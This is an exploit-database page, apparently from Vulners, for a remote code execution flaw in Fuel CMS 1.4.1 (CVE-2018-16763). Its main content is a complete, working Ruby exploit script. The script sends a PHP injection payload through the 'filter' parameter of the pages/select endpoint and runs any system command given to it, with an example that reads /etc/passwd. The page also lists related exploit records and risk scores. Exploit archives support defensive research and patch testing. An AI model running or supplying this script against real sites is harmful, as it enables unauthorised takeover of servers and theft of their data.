Vulners
Lucene search
Fuel CMS 1.4.1 - Remote Code Execution (2)
๐๏ธย 28 Jan 2021ย 00:00:00Reported byย Alexandre ZANNITypeย 
ย exploitdb๐ย www.exploit-db.com๐ย 980ย Views
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | fuelCMS 1.4.1 - Remote Code Execution Exploit | 20 Jul 201900:00 | โ | zdt |
| Fuel CMS 1.4.1 - Remote Code Execution Exploit (3) | 3 Nov 202100:00 | โ | zdt |
 | Exploit for Injection in Thedaylightstudio Fuel_Cms | 10 Oct 202020:23 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 31 May 202215:31 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 10 Oct 202020:23 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 3 Nov 202104:38 | โ | githubexploit |
| Exploit for Injection in Thedaylightstudio Fuel_Cms | 9 Apr 202622:37 | โ | githubexploit |
 | CVE-2018-16763 | 9 Sep 201800:00 | โ | attackerkb |
 | CVE-2018-16763 | 13 Jul 202213:02 | โ | circl |
 | FUEL CMS Remote Code Execution (CVE-2018-16763) | 31 May 202000:00 | โ | checkpoint_advisories |
10
# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu 16.04
# CVE : CVE-2018-16763
# References: https://www.exploit-db.com/exploits/47138
#!/usr/bin/env ruby
require 'httpclient'
require 'docopt'
# dirty workaround to ignore Max-Age
# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
$VERBOSE = nil
doc = <<~DOCOPT
Fuel CMS 1.4 - Remote Code Execution
Usage:
#{__FILE__} <url> <cmd>
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<cmd> The system command to execute
-h, --help Show this screen
Examples:
#{__FILE__} http://example.org id
#{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT
def exploit(client, root_url, cmd)
url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
res = client.get(url)
/system(.+?)<div/mx.match(res.body).captures[0].chomp
end
begin
args = Docopt.docopt(doc)
clnt = HTTPClient.new
puts exploit(clnt, args['<url>'], args['<cmd>'])
rescue Docopt::Exit => e
puts e.message
endData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jan 2021 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 3.19.8
EPSS0.9391